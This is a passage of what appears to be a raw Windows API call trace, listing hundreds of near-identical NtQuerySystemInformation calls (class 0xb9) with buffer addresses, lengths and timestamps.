(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0283.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0283.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x28, ResultLength=0x0) [0283.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c930, Length=0x20, ResultLength=0x0) [0283.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c930, Length=0x20, ResultLength=0x0) [0283.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c930, Length=0x20, ResultLength=0x0) [0283.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0283.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0283.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca20, Length=0x28, ResultLength=0x0) [0283.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x28, ResultLength=0x0) [0283.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0283.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0283.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0283.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0283.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0283.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0283.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0283.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0283.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0283.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x28, ResultLength=0x0) [0283.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0283.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0283.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.086] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c950, Length=0x20, ResultLength=0x0) [0283.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0283.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0283.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0283.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0283.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0283.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0283.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9d0, Length=0x20, ResultLength=0x0) [0283.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9d0, Length=0x20, ResultLength=0x0) [0283.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf38, Length=0x50, ResultLength=0x0) [0283.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0283.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0283.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0283.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0283.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0283.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0283.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0283.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x28, ResultLength=0x0) [0283.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x28, ResultLength=0x0) [0283.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0283.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x20, ResultLength=0x0) [0283.120] NtQuerySystemInformation 